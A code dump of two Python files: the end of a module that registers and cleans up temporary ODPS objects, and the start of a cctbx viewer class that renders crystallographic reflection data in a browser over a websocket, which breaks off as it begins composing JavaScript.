for biz_id in biz_ids:
files.extend(glob.glob(os.path.join(TEMP_ROOT, biz_id, odps_key, '*.his')))
for fn in files:
repo = ObjectRepository(fn)
repo.cleanup(odps, use_threads=False)
def clean_stored_objects(odps):
global cleanup_timeout, host_pid
if not utils.is_main_process():
return
odps_key = _gen_repository_key(odps)
if odps_key in _cleaned_keys:
return
_cleaned_keys.add(odps_key)
files = []
for biz_id in _obj_repos.biz_ids:
files.extend(glob.glob(os.path.join(TEMP_ROOT, biz_id, odps_key, '*.his')))
def clean_thread():
for fn in files:
writer_pid = int(fn.rsplit('__', 1)[-1].split('.', 1)[0])
# we do not clean running process, unless its pid equals host_pid
if writer_pid != host_pid and _is_pid_running(writer_pid):
continue
repo = ObjectRepository(fn)
repo.cleanup(odps)
thread_obj = threading.Thread(target=clean_thread)
thread_obj.start()
if cleanup_timeout == 0:
return
else:
if cleanup_timeout is not None and cleanup_timeout < 0:
cleanup_timeout = None
thread_obj.join(cleanup_timeout)
def _gen_repository_key(odps):
if hasattr(odps.account, 'access_id'):
keys = [odps.account.access_id, odps.endpoint, odps.project]
elif hasattr(odps.account, 'token'):
keys = [odps.account.token, odps.endpoint, odps.project]
return hashlib.md5('####'.join(keys).encode('utf-8')).hexdigest()
def _put_objects(odps, objs):
odps_key = _gen_repository_key(odps)
biz_id = options.biz_id if options.biz_id else 'default'
ObjectRepositoryLib.add_biz_id(biz_id)
if odps_key not in _obj_repos:
if isinstance(odps.account, AliyunAccount):
ObjectRepositoryLib.add_odps_info(odps)
file_dir = os.path.join(TEMP_ROOT, biz_id, odps_key)
try:
if not os.path.exists(file_dir):
os.makedirs(file_dir)
except OSError:
pass
file_name = os.path.join(file_dir, 'temp_objs_{0}__{1}.his'.format(SESSION_KEY, os.getpid()))
_obj_repos[odps_key] = ObjectRepository(file_name)
[_obj_repos[odps_key].put(o, False) for o in objs]
_obj_repos[odps_key].dump()
def register_temp_table(odps, table, project=None):
if isinstance(table, six.string_types):
table = [table, ]
_put_objects(odps, [TempTable(t, project if project else odps.project) for t in table])
def register_temp_model(odps, model, project=None):
if isinstance(model, six.string_types):
model = [model, ]
_put_objects(odps, [TempModel(m, project if project else odps.project) for m in model])
def register_temp_resource(odps, resource, project=None):
if isinstance(resource, six.string_types):
resource = [resource, ]
_put_objects(odps, [TempResource(r, project if project else odps.project) for r in resource])
def register_temp_function(odps, func, project=None):
if isinstance(func, six.string_types):
func = [func, ]
_put_objects(odps, [TempFunction(f, project if project else odps.project) for f in func])
def register_temp_volume_partition(odps, volume_partition_tuple, project=None):
if isinstance(volume_partition_tuple, tuple):
volume_partition_tuple = [volume_partition_tuple, ]
_put_objects(odps, [TempVolumePartition(v, p, project if project else odps.project)
for v, p in volume_partition_tuple])
def compat_kwargs(kwargs):
if PY26:
new_desc = dict()
for k, v in six.iteritems(kwargs):
new_desc[k.encode('utf-8') if isinstance(k, unicode) else k] = v.encode('utf-8')
return new_desc
else:
return kwargs
|
jsview_3d.py
|
from __future__ import absolute_import, division, print_function
from libtbx.math_utils import roundoff
import traceback
from cctbx.miller import display2 as display
from cctbx.array_family import flex
from cctbx import miller
from scitbx import graphics_utils
from scitbx import matrix
import scitbx.math
from libtbx.utils import Sorry, to_str
from websocket_server import WebsocketServer
import threading, math, sys, cmath
from time import sleep
import os.path, time, copy
import libtbx
from libtbx import easy_mp
import webbrowser, tempfile
from six.moves import range
def has_phil_path(philobj, path):
return [ e.path for e in philobj.all_definitions() if path in e.path ]
class ArrayInfo:
def __init__(self, millarr, mprint=sys.stdout.write, fomlabel=None):
from iotbx.gui_tools.reflections import get_array_description
data = millarr.data()
if (isinstance(data, flex.int)):
data = [e for e in data if e!= display.inanval]
if millarr.is_complex_array():
data = flex.abs(millarr.data())
data = [e for e in data if not math.isnan(e)]
self.maxdata =max( data )
self.mindata =min( data )
self.maxsigmas = self.minsigmas = None
if millarr.sigmas() is not None:
data = millarr.sigmas()
data = [e for e in data if not math.isnan(e)]
self.maxsigmas =max( data )
self.minsigmas =min( data )
self.minmaxdata = (roundoff(self.mindata), roundoff(self.maxdata))
self.minmaxsigs = (roundoff(self.minsigmas), roundoff(self.maxsigmas))
self.labels = self.desc = ""
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
if millarr.info():
self.labels = millarr.info().label_string()
if fomlabel:
self.labels = millarr.info().label_string() + " + " + fomlabel
self.desc = get_array_description(millarr)
self.span = ("?" , "?")
self.spginf = millarr.space_group_info().symbol_and_number()
dmin = 0.0
dmax = 0.0
try:
self.span = ( millarr.index_span().min(), millarr.index_span().max())
dmin = millarr.d_max_min()[1]
dmax = millarr.d_max_min()[0]
except Exception as e:
mprint(to_str(e))
issymunique = millarr.is_unique_set_under_symmetry()
isanomalous = millarr.anomalous_flag()
self.infotpl = ( self.labels, self.desc, self.spginf, millarr.indices().size(), self.span,
self.minmaxdata, self.minmaxsigs, (roundoff(dmin), roundoff(dmax)), issymunique, isanomalous )
self.infostr = "%s (%s), space group: %s, %s HKLs: %s, MinMax: %s, MinMaxSigs: %s, d_minmax: %s, SymUnique: %d, Anomalous: %d" %self.infotpl
def MakeHKLscene( proc_array, pidx, setts, mapcoef_fom_dict, merge, mprint=sys.stdout.write):
scenemaxdata =[]
scenemindata =[]
scenemaxsigmas = []
sceneminsigmas = []
scenearrayinfos = []
hklscenes = []
fomsarrays_idx = [(None, None)]
#mprint("in MakeHKLscene", verbose=True)
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
if proc_array.is_complex_array():
fomsarrays_idx.extend( mapcoef_fom_dict.get(proc_array.info().label_string()) )
settings = setts
if (settings.expand_anomalous or settings.expand_to_p1) \
and not proc_array.is_unique_set_under_symmetry() and not merge:
#settings = copy.deepcopy(settings)
settings.expand_anomalous = False
settings.expand_to_p1 = False
mprint("The " + proc_array.info().label_string() + \
" array is not symmetry unique and therefore won't be expanded")
if (settings.inbrowser==True):
settings.expand_anomalous = False
settings.expand_to_p1 = False
for (fomsarray, fidx) in fomsarrays_idx:
hklscene = display.scene(miller_array=proc_array, merge=merge,
settings=settings, foms_array=fomsarray, fullprocessarray=True )
if not hklscene.SceneCreated:
mprint("The " + proc_array.info().label_string() + " array was not processed")
#return False
continue
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
# cast any NAN values to 1 of the colours and radii to 0.2 before writing javascript
if hklscene.SceneCreated:
hklscenes.append( hklscene)
b = flex.bool([bool(math.isnan(e[0]) + math.isnan(e[1]) + math.isnan(e[2])) for e in hklscene.colors])
hklscene.colors = hklscene.colors.set_selected(b, (1.0, 1.0, 1.0))
b = flex.bool([bool(math.isnan(e)) for e in hklscene.radii])
hklscene.radii = hklscene.radii.set_selected(b, 0.2)
fomslabel = None
if fomsarray:
fomslabel = fomsarray.info().label_string()
ainf = ArrayInfo(hklscene.work_array, fomlabel=fomslabel)
scenemaxdata.append( ainf.maxdata )
scenemindata.append( ainf.mindata )
scenemaxsigmas.append(ainf.maxsigmas)
sceneminsigmas.append(ainf.minsigmas)
scenearrayinfos.append((ainf.infostr, pidx, fidx, ainf.labels))
#self.mprint("%d, %s" %(i, infostr) )
#i +=1
return (hklscenes, scenemaxdata, scenemindata, scenemaxsigmas, sceneminsigmas, scenearrayinfos)
def MakeTtips(hklscene, j):
tooltipstringsdict = {}
colstraliases = ""
if hklscene.isUsingFOMs():
return tooltipstringsdict, colstraliases # already have tooltips for the scene without the associated fom
colstraliases += "\n var st%d = '\\n%s: '" %(j, hklscene.work_array.info().label_string() )
ocolstr = hklscene.work_array.info().label_string()
if hklscene.work_array.is_complex_array():
ampl = flex.abs(hklscene.data)
phases = flex.arg(hklscene.data) * 180.0/math.pi
# purge nan values from array to avoid crash in fmod_positive()
b = flex.bool([bool(math.isnan(e)) for e in phases])
# replace the nan values with an arbitrary float value
phases = phases.set_selected(b, 42.4242)
# Cast negative degrees to equivalent positive degrees
phases = flex.fmod_positive(phases, 360.0)
sigmas = hklscene.sigmas
for i,datval in enumerate(hklscene.data):
od =""
if hklscene.work_array.is_complex_array():
od = str(roundoff(ampl[i], 2)) + ", " + str(roundoff(phases[i], 1)) + \
"\'+DGR+\'"
elif sigmas is not None:
od = str(roundoff(datval, 2)) + ", " + str(roundoff(sigmas[i], 2))
else:
od = str(roundoff(datval, 2))
if not (math.isnan( abs(datval) ) or datval == display.inanval):
hkl = hklscene.indices[i]
if not tooltipstringsdict.has_key(hkl):
spbufttip = '\'+hk+\'%s, %s, %s' %(hkl[0], hkl[1], hkl[2])
spbufttip += '\ndres: %s ' %str(roundoff(hklscene.dres[i], 2) )
spbufttip += '\'+AA+\'' # javascript alias for angstrom
tooltipstringsdict[hkl] = spbufttip
# st1, st2,... are javascript aliases for miller array labelstrings as declared in colstraliases
tooltipstringsdict[hkl] += '\'+st%d+\'%s' %(j, od)
return tooltipstringsdict, colstraliases
class hklview_3d:
def __init__ (self, *args, **kwds) :
self.settings = kwds.get("settings")
self.ngl_settings = None #NGLsettings()
self.viewerparams = None
self.params = None
self.miller_array = None
self.symops = []
self.sg = None
self.tooltipstrings = []
self.tooltipstringsdict = {}
self.d_min = None
self.scene = None
self.merge = False
self.NGLscriptstr = ""
self.camera_type = "orthographic"
self.primitivetype = "SphereBuffer"
self.script_has_tooltips = False
self.url = ""
self.binscenelabel = "Resolution"
self.colour_scene_id = None
self.radii_scene_id = None
#self.scene_id = None
self.rotation_mx = matrix.identity(3)
self.rot_recip_zvec = None
self.rot_zvec = None
self.meanradius = -1
self.past = time.time()
self.orientmessage = None
self.high_quality = True
if kwds.has_key('high_quality'):
self.high_quality = kwds['high_quality']
self.cameradist = 0.0
self.clipNear = None
self.clipFar = None
self.cameraPosZ = None
self.boundingX = None
self.boundingY = None
self.boundingZ = None
self.OrigClipNear = None
self.OrigClipFar = None
self.cameratranslation = ( 0,0,0 )
#self.angle_x_svec = 0.0
#self.angle_y_svec = 0.0
self.angle_z_svec = 0.0
#self.angle_z_yzvec = 0.0
#self.angle_y_yzvec = 0.0
#self.angle_y_xyvec = 0.0
self.angle_x_xyvec = 0.0
self.vecrotmx = None
self.unit_h_axis = None
self.unit_k_axis = None
self.unit_l_axis = None
self.normal_hk = None
self.normal_kl = None
self.normal_lh = None
self.isnewfile = False
self.has_new_miller_array = False
self.sleeptime = 0.025
self.colstraliases = ""
self.binvals = []
self.binvalsboundaries = []
self.proc_arrays = []
self.HKLscenes = []
self.HKLscenesdict = {}
self.HKLscenesMaxdata = []
self.HKLscenesMindata = []
self.HKLscenesMaxsigmas = []
self.HKLscenesMinsigmas = []
self.bindata = None
self.sceneisdirty = True
self.hkl_scenes_info = []
self.match_valarrays = []
self.array_infostrs = []
self.array_infotpls = []
self.binstrs = []
self.bin_infotpls = []
self.mapcoef_fom_dict = {}
self.verbose = 0
if kwds.has_key('verbose'):
self.verbose = kwds['verbose']
self.mprint = sys.stdout.write
if 'mprint' in kwds:
self.mprint = kwds['mprint']
self.nbinvalsboundaries = 0
tempdir = tempfile.gettempdir()
self.hklfname = os.path.join(tempdir, "hkl.htm" )
if os.path.isfile(self.hklfname):
os.remove(self.hklfname)
if 'htmlfname' in kwds and kwds['htmlfname']:
self.hklfname = kwds['htmlfname']
self.hklfname = os.path.abspath( self.hklfname )
self.jscriptfname = os.path.join(tempdir, "hkljstr.js")
if os.path.isfile(self.jscriptfname):
os.remove(self.jscriptfname)
if 'jscriptfname' in kwds and kwds['jscriptfname'] != "":
self.jscriptfname = kwds['jscriptfname']
self.websockport = 7894
if 'websockport' in kwds:
self.websockport = kwds['websockport']
self.guisocket = None
if 'guisocket' in kwds:
self.guisocket = kwds['guisocket']
self.mprint('Output will be written to \"%s\"\n' \
'including reference to NGL JavaScript \"%s\"' %(self.hklfname, self.jscriptfname))
self.hklhtml = r"""
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<meta charset="utf-8" />
</head>
<body>
<script src="%s" type="text/javascript"></script>
<script src="%s" type="text/javascript"></script>
"""
self.htmldiv = """
<div id="viewport" style="width:100%; height:100%;"></div>
</body></html>
"""
self.colourgradientvalues = []
self.isinjected = False
self.UseOSBrowser = True
if 'UseOSBrowser' in kwds:
self.UseOSBrowser = kwds['UseOSBrowser']
self.viewmtrx = None
self.HKLscenesKey = ( 0, False,
self.settings.expand_anomalous, self.settings.expand_to_p1 )
self.msgqueue = []
self.websockclient = None
self.handshakewait = 5
if 'handshakewait' in kwds:
self.handshakewait = kwds['handshakewait']
self.lastmsg = "" # "Ready"
self.browserisopen = False
self.msgdelim = ":\n"
self.msgqueuethrd = None
self.StartWebsocket()
def __exit__(self, exc_type, exc_value, traceback):
# not called unless instantiated with a "with hklview_3d ... " statement
self.server.shutdown()
if os.path.isfile(self.hklfname):
os.remove(self.hklfname)
def SendInfoToGUI(self, mydict):
if self.guisocket:
self.guisocket.send( str(mydict).encode("utf-8") )
def update_settings(self, diff_phil, curphilparam) :
self.ngl_settings = curphilparam.viewer.NGL
self.viewerparams = curphilparam.viewer
self.params = curphilparam
if has_phil_path(diff_phil, "filename") \
or has_phil_path(diff_phil, "spacegroup_choice") \
or has_phil_path(diff_phil, "merge_data") \
or has_phil_path(diff_phil, "miller_array_operation") \
or has_phil_path(diff_phil, "scene_id") \
or has_phil_path(diff_phil, "camera_type") \
or has_phil_path(diff_phil, "spacegroup_choice") \
or has_phil_path(diff_phil, "using_space_subgroup") \
or has_phil_path(diff_phil, "viewer") \
and ( \
has_phil_path(diff_phil, "show_data_over_sigma") \
or has_phil_path(diff_phil, "show_missing") \
or has_phil_path(diff_phil, "show_only_missing") \
or has_phil_path(diff_phil, "show_systematic_absences") \
or has_phil_path(diff_phil, "slice_axis") \
or has_phil_path(diff_phil, "slice_mode") \
or has_phil_path(diff_phil, "slice_index") \
or has_phil_path(diff_phil, "scale") \
or has_phil_path(diff_phil, "nth_power_scale_radii") \
or self.settings.inbrowser==False and \
( has_phil_path(diff_phil, "expand_anomalous") or \
has_phil_path(diff_phil, "expand_to_p1") )\
or has_phil_path(diff_phil, "show_anomalous_pairs") \
):
if curphilparam.viewer.slice_mode and self.settings.inbrowser:
self.settings.inbrowser = False
self.sceneisdirty = True
self.ConstructReciprocalSpace(curphilparam, merge=self.merge)
msg = ""
if has_phil_path(diff_phil, "show_missing") \
or has_phil_path(diff_phil, "show_only_missing") \
or has_phil_path(diff_phil, "show_systematic_absences") \
or has_phil_path(diff_phil, "scene_bin_thresholds") \
or has_phil_path(diff_phil, "bin_scene_label") \
or has_phil_path(diff_phil, "nbins"):
self.binvals = self.calc_bin_thresholds(curphilparam.bin_scene_label, curphilparam.nbins)
self.sceneisdirty = True
if has_phil_path(diff_phil, "camera_type"):
self.set_camera_type()
if self.viewerparams.scene_id >=0:
if not self.isinjected:
self.scene = self.HKLscenes[self.viewerparams.scene_id]
self.DrawNGLJavaScript()
msg = "Rendered %d reflections\n" % self.scene.points.size()
if has_phil_path(diff_phil, "fixorientation"):
self.fix_orientation(curphilparam.viewer.NGL.fixorientation)
if has_phil_path(diff_phil, "mouse_sensitivity"):
self.SetTrackBallRotateSpeed(curphilparam.viewer.NGL.mouse_sensitivity)
if curphilparam.viewer.slice_mode: # explicit slicing
if curphilparam.viewer.slice_axis=="h": hkl = [1,0,0]
if curphilparam.viewer.slice_axis=="k": hkl = [0,1,0]
if curphilparam.viewer.slice_axis=="l": hkl = [0,0,1]
self.clip_plane_hkl_vector(hkl[0], hkl[1], hkl[2], clipwidth=200,
fixorientation = curphilparam.viewer.NGL.fixorientation)
if self.settings.inbrowser and not curphilparam.viewer.slice_mode:
msg += self.ExpandInBrowser(P1= self.settings.expand_to_p1,
friedel_mate= self.settings.expand_anomalous)
if curphilparam.clip_plane.clipwidth and not \
( has_phil_path(diff_phil, "angle_around_vector") \
or has_phil_path(diff_phil, "bequiet") ):
if curphilparam.clip_plane.is_real_space_frac_vec:
self.clip_plane_abc_vector(curphilparam.clip_plane.h, curphilparam.clip_plane.k,
curphilparam.clip_plane.l, curphilparam.clip_plane.hkldist,
curphilparam.clip_plane.clipwidth, curphilparam.viewer.NGL.fixorientation,
curphilparam.clip_plane.is_parallel)
else:
self.clip_plane_hkl_vector(curphilparam.clip_plane.h, curphilparam.clip_plane.k,
curphilparam.clip_plane.l, curphilparam.clip_plane.hkldist,
curphilparam.clip_plane.clipwidth, curphilparam.viewer.NGL.fixorientation,
curphilparam.clip_plane.is_parallel)
msg += self.SetOpacities(curphilparam.viewer.NGL.bin_opacities )
if has_phil_path(diff_phil, "tooltip_alpha"):
self.set_tooltip_opacity()
return msg, curphilparam
def set_miller_array(self, scene_id=None, merge=None, details=""):
if scene_id is not None:
self.viewerparams.scene_id = scene_id
self.isinjected = False
if self.viewerparams and self.viewerparams.scene_id >= 0 and self.HKLscenes:
self.miller_array = self.HKLscenes[self.viewerparams.scene_id].miller_array
self.scene = self.HKLscenes[self.viewerparams.scene_id]
self.merge = merge
if (self.miller_array is None):
return
self.identify_suitable_fomsarrays()
self.d_min = self.miller_array.d_min()
array_info = self.miller_array.info()
self.sg = self.miller_array.space_group()
self.symops = self.sg.all_ops()
self.binvals = [ 1.0/self.miller_array.d_max_min()[0], 1.0/self.miller_array.d_max_min()[1] ]
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
uc = "a=%g b=%g c=%g angles=%g,%g,%g" % self.miller_array.unit_cell().parameters()
self.mprint( "Data: %s %s, %d reflections in space group: %s, unit Cell: %s" \
% (array_info.label_string(), details, self.miller_array.indices().size(), \
self.miller_array.space_group_info(), uc), verbose=0 )
def MakeToolTips(self, HKLscenes):
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
allcolstraliases = "var hk = \'H,K,L: \';\n"
alltooltipstringsdict = {}
if self.script_has_tooltips:
# large data sets will make javascript file very large with risk of crashing browser
self.mprint( "making tooltips")
tooltipstringsdict = {}
for j,hklscene in enumerate(HKLscenes):
#tooltipstringsdict, colstraliases = MakeTtips(hklscene, j)
#"""
if hklscene.isUsingFOMs():
continue # already have tooltips for the scene without the associated fom
colstraliases = "\n var st%d = '\\n%s: ';" %(j, hklscene.work_array.info().label_string() )
ocolstr = hklscene.work_array.info().label_string()
if hklscene.work_array.is_complex_array():
ampl = flex.abs(hklscene.data)
phases = flex.arg(hklscene.data) * 180.0/math.pi
# purge nan values from array to avoid crash in fmod_positive()
b = flex.bool([bool(math.isnan(e)) for e in phases])
# replace the nan values with an arbitrary float value
phases = phases.set_selected(b, 42.4242)
# Cast negative degrees to equivalent positive degrees
phases = flex.fmod_positive(phases, 360.0)
sigmas = hklscene.sigmas
for i,datval in enumerate(hklscene.data):
hkl = hklscene.indices[i]
if not tooltipstringsdict.has_key(hkl):
spbufttip = '\'+hk+\'%s, %s, %s' %(hkl[0], hkl[1], hkl[2])
spbufttip += '\ndres: %s ' %str(roundoff(hklscene.dres[i], 2) )
spbufttip += '\'+AA+\'' # javascript alias for angstrom
tooltipstringsdict[hkl] = spbufttip
od =""
if hklscene.work_array.is_complex_array():
od = str(roundoff(ampl[i], 2)) + ", " + str(roundoff(phases[i], 1)) + \
"\'+DGR+\'"
elif sigmas is not None:
od = str(roundoff(datval, 2)) + ", " + str(roundoff(sigmas[i], 2))
else:
od = str(roundoff(datval, 2))
if not (math.isnan( abs(datval) ) or datval == display.inanval):
# st1, st2,... are javascript aliases for miller array labelstrings as declared in self.colstraliases
tooltipstringsdict[hkl] += '\'+st%d+\'%s' %(j, od)
#"""
alltooltipstringsdict.update( tooltipstringsdict )
allcolstraliases += colstraliases
allcolstraliases += "\n"
return alltooltipstringsdict, allcolstraliases
def GetTooltipOnTheFly(self, id, rotmx=None, anomalous=False):
hkl = self.scene.indices[id]
hklvec = flex.vec3_double( [(hkl[0], hkl[1], hkl[2])])
Rhkl = hklvec[0]
if rotmx:
Rhkl = hklvec[0] * rotmx
rothkl = Rhkl
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
if anomalous:
rothkl = (-Rhkl[0], -Rhkl[1], -Rhkl[2])
spbufttip = '\'H,K,L: %d, %d, %d' %(rothkl[0], rothkl[1], rothkl[2])
# resolution and angstrom character
spbufttip += '\\ndres: %s \'+ String.fromCharCode(197) +\'' \
%str(roundoff(self.miller_array.unit_cell().d(hkl), 2) )
for hklscene in self.HKLscenes:
if hklscene.isUsingFOMs():
continue # already have tooltips for the scene without the associated fom
datval = None
if hkl in hklscene.work_array.indices():
datval = hklscene.work_array.data_at_first_index(hkl)
else:
if id >= hklscene.data.size():
continue
datval = hklscene.data[id]
if datval and (not (math.isnan( abs(datval) ) or datval == display.inanval)):
if hklscene.work_array.is_complex_array():
ampl = abs(datval)
phase = cmath.phase(datval) * 180.0/math.pi
# purge nan values from array to avoid crash in fmod_positive()
# and replace the nan values with an arbitrary float value
if math.isnan(phase):
phase = 42.4242
# Cast negative degrees to equivalent positive degrees
phase = phase % 360.0
spbufttip +="\\n" + hklscene.work_array.info().label_string() + ': '
if hklscene.work_array.is_complex_array():
spbufttip += str(roundoff(ampl, 2)) + ", " + str(roundoff(phase, 1)) + \
"\'+ String.fromCharCode(176) +\'" # degree character
elif hklscene.work_array.sigmas() is not None:
sigma = hklscene.work_array.sigma_at_first_index(hkl)
spbufttip += str(roundoff(datval, 2)) + ", " + str(roundoff(sigma, 2))
else:
spbufttip += str(roundoff(datval, 2))
spbufttip += '\''
return spbufttip
def get_col_fomcol(self, idx):
if len(self.hkl_scenes_info) == 0:
return -1, -1
return self.hkl_scenes_info[idx][6], self.hkl_scenes_info[idx][7]
def ConstructReciprocalSpace(self, curphilparam, merge=None):
#self.miller_array = self.match_valarrays[self.scene_id]
#self.miller_array = self.proc_arrays[self.scene_id]
self.HKLscenesKey = (curphilparam.filename,
curphilparam.spacegroup_choice,
curphilparam.using_space_subgroup,
curphilparam.merge_data,
self.settings.expand_anomalous,
self.settings.expand_to_p1,
self.settings.inbrowser,
self.settings.slice_axis,
self.settings.slice_mode,
self.settings.slice_index,
self.settings.show_missing,
self.settings.show_only_missing,
self.settings.show_systematic_absences,
self.settings.scale,
self.settings.nth_power_scale_radii
)
if self.HKLscenesdict.has_key(self.HKLscenesKey) and not self.has_new_miller_array:
(
self.HKLscenes,
self.tooltipstringsdict,
self.HKLscenesMaxdata,
self.HKLscenesMindata,
self.HKLscenesMaxsigmas,
self.HKLscenesMinsigmas,
self.hkl_scenes_info
) = self.HKLscenesdict[self.HKLscenesKey]
self.mprint("Scene key is already present", verbose=1)
#self.sceneisdirty = False
return True
self.mprint("Constructing HKL scenes", verbose=0)
HKLscenes = []
HKLscenesMaxdata = []
HKLscenesMindata = []
HKLscenesMaxsigmas = []
HKLscenesMinsigmas = []
hkl_scenes_info = []
tooltipstringsdict = {}
i = 0
# arguments tuple for multi_core_run
assert(self.proc_arrays)
argstuples = [ (e.deep_copy(), idx, copy.deepcopy(self.settings), self.mapcoef_fom_dict, merge, self.mprint) \
for (idx,e) in enumerate(self.proc_arrays)]
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
"""
for (i, (args, res, errstr)) in enumerate( easy_mp.multi_core_run( MakeHKLscene, argstuples, 8)):
if errstr:
self.mprint(errstr)
(hkl_scenes, scenemaxdata,
scenemindata, scenemaxsigmas,
sceneminsigmas, scenearrayinfos
) = res
HKLscenesMaxdata.extend(scenemaxdata)
HKLscenesMindata.extend(scenemindata)
HKLscenesMaxsigmas.extend(scenemaxsigmas)
HKLscenesMinsigmas.extend(sceneminsigmas)
hkl_scenes_info.extend(scenearrayinfos)
HKLscenes.extend(hkl_scenes)
for inf in scenearrayinfos:
self.mprint("%d, %s" %(i, inf) )
i += 1
"""
for j,proc_array in enumerate(self.proc_arrays):
(hklscenes, scenemaxdata,
scenemindata, scenemaxsigmas,
sceneminsigmas, scenearrayinfos
) = MakeHKLscene(argstuples[j][0], argstuples[j][1], argstuples[j][2], argstuples[j][3], argstuples[j][4], argstuples[j][5] )
#) = MakeHKLscene(proc_array, j, copy.deepcopy(self.settings), self.mapcoef_fom_dict, None)
HKLscenesMaxdata.extend(scenemaxdata)
HKLscenesMindata.extend(scenemindata)
HKLscenesMaxsigmas.extend(scenemaxsigmas)
HKLscenesMinsigmas.extend(sceneminsigmas)
hkl_scenes_info.extend(scenearrayinfos)
HKLscenes.extend(hklscenes)
#for inf in scenearrayinfos:
# self.mprint("%d, %s" %(i, inf) )
# i += 1
tooltipstringsdict, self.colstraliases = self.MakeToolTips(HKLscenes)
self.HKLscenesdict[self.HKLscenesKey] = (
HKLscenes,
tooltipstringsdict,
HKLscenesMaxdata,
HKLscenesMindata,
HKLscenesMaxsigmas,
HKLscenesMinsigmas,
hkl_scenes_info
)
(
self.HKLscenes,
self.tooltipstringsdict,
self.HKLscenesMaxdata,
self.HKLscenesMindata,
self.HKLscenesMaxsigmas,
self.HKLscenesMinsigmas,
self.hkl_scenes_info
) = self.HKLscenesdict[self.HKLscenesKey]
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
self.mprint("\nReflection data scenes:", verbose=0)
for j,inf in enumerate(hkl_scenes_info):
self.mprint("%d, %s" %(j, inf[0]), verbose=0)
self.sceneisdirty = True
self.SendInfoToGUI({ "hklscenes_arrays": self.hkl_scenes_info, "NewHKLscenes" : True })
self.has_new_miller_array = False
return True
def identify_suitable_fomsarrays(self):
self.mprint("Matching complex arrays to suitable FOM arrays")
self.mapcoef_fom_dict = {}
for proc_array in self.proc_arrays:
fom_arrays_idx = []
for i,foms_array in enumerate(self.proc_arrays):
if not proc_array.is_complex_array() or not foms_array.is_real_array():
continue
if proc_array.size() != foms_array.size():
continue
if min(foms_array.data()) < 0.0 or max(foms_array.data()) > 1.0:
continue
fom_arrays_idx.append( (foms_array, i) )
self.mapcoef_fom_dict[proc_array.info().label_string()] = fom_arrays_idx
def calc_bin_thresholds(self, bin_scene_label, nbins):
self.binscenelabel = bin_scene_label
if self.binscenelabel=="Resolution":
warray = self.HKLscenes[int(self.viewerparams.scene_id)].work_array
dres = self.HKLscenes[int(self.viewerparams.scene_id)].dres
uc = warray.unit_cell()
indices = self.HKLscenes[int(self.viewerparams.scene_id)].indices
binning = miller.binning( uc, nbins, indices, max(dres), min(dres) )
binvals = [ binning.bin_d_range(n)[0] for n in binning.range_all() ]
binvals = [ e for e in binvals if e != -1.0] # delete dummy limit
binvals = list( 1.0/flex.double(binvals) )
else:
bindata = self.HKLscenes[int(self.binscenelabel)].data.deep_copy()
selection = flex.sort_permutation( bindata )
bindata_sorted = bindata.select(selection)
# get binvals by dividing bindata_sorted with nbins
binvals = [bindata_sorted[0]] * nbins #
for i,e in enumerate(bindata_sorted):
idiv = int(nbins*float(i)/len(bindata_sorted))
binvals[idiv] = e
binvals.sort()
return binvals
def UpdateBinValues(self, binvals = [] ):
if binvals:
binvals.sort()
self.binvals = binvals
else: # ensure default resolution interval includes all data by avoiding rounding errors
self.binvals = [ 1.0/(self.miller_array.d_max_min()[0]*1.001),
1.0/(self.miller_array.d_max_min()[1]*0.999) ]
def MatchBinArrayToSceneArray(self, ibinarray):
# match bindata with data(scene_id)
if self.binscenelabel=="Resolution":
return 1.0/self.scene.dres
# get the array id that is mapped through an HKLscene id
binarraydata = self.HKLscenes[ibinarray].data
scenearraydata = self.HKLscenes[self.viewerparams.scene_id].data
matchindices = miller.match_indices(self.HKLscenes[self.viewerparams.scene_id].indices, self.HKLscenes[ibinarray].indices )
matched_binarray = binarraydata.select( matchindices.pairs().column(1) )
#valarray.sort(by_value="packed_indices")
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
#missing = scenearraydata.lone_set( valarray )
# insert NAN values for reflections in self.miller_array not found in binarray
#valarray = display.ExtendMillerArray(valarray, missing.size(), missing.indices() )
#match_valindices = miller.match_indices(scenearray.indices(), valarray.indices() )
#match_valarray = valarray.select( match_valindices.pairs().column(1) )
#match_valarray.sort(by_value="packed_indices")
#match_valarray.set_info(binarraydata.info() )
# patch the bin array so its sequence matches the scene array
patched_binarraydata = []
c = 0
for b in matchindices.pair_selection(0):
if b:
patched_binarraydata.append(matched_binarray[c])
c +=1
else:
patched_binarraydata.append(float("nan"))
return flex.double(patched_binarraydata)
def OperateOn1MillerArray(self, millarr, operation):
# lets user specify a one line python expression operating on data, sigmas
data = millarr.data()
sigmas = millarr.sigmas()
dres = millarr.unit_cell().d( millarr.indices() )
newarray = millarr.deep_copy()
self.mprint("Creating new miller array through the operation: %s" %operation)
try:
newdata = None
newsigmas = None
exec(operation)
newarray._data = newdata
newarray._sigmas = newsigmas
return newarray
except Exception as e:
self.mprint( str(e), verbose=0)
return None
def OperateOn2MillerArrays(self, millarr1, millarr2, operation):
# lets user specify a one line python expression operating on data1 and data2
matchindices = miller.match_indices(millarr1.indices(), millarr2.indices() )
matcharr1 = millarr1.select( matchindices.pairs().column(0) )
matcharr2 = millarr2.select( matchindices.pairs().column(1) )
data1 = matcharr1.data()
data2 = matcharr2.data()
sigmas1 = matcharr1.sigmas()
sigmas2 = matcharr2.sigmas()
dres = matcharr1.unit_cell().d( matcharr1.indices() )
newarray = matcharr2.deep_copy()
newarray._sigmas = None
self.mprint("Creating new miller array through the operation: %s" %operation)
try:
newdata = None
newsigmas = None
exec(operation)
newarray._data = newdata
newarray._sigmas = newsigmas
return newarray
except Exception as e:
self.mprint( str(e), verbose=0)
return None
def DrawNGLJavaScript(self, blankscene=False):
if not self.scene or not self.sceneisdirty:
return
if self.miller_array is None :
self.mprint( "Select an HKL scene to display reflections" )
return
self.mprint("Composing JavaScript...")
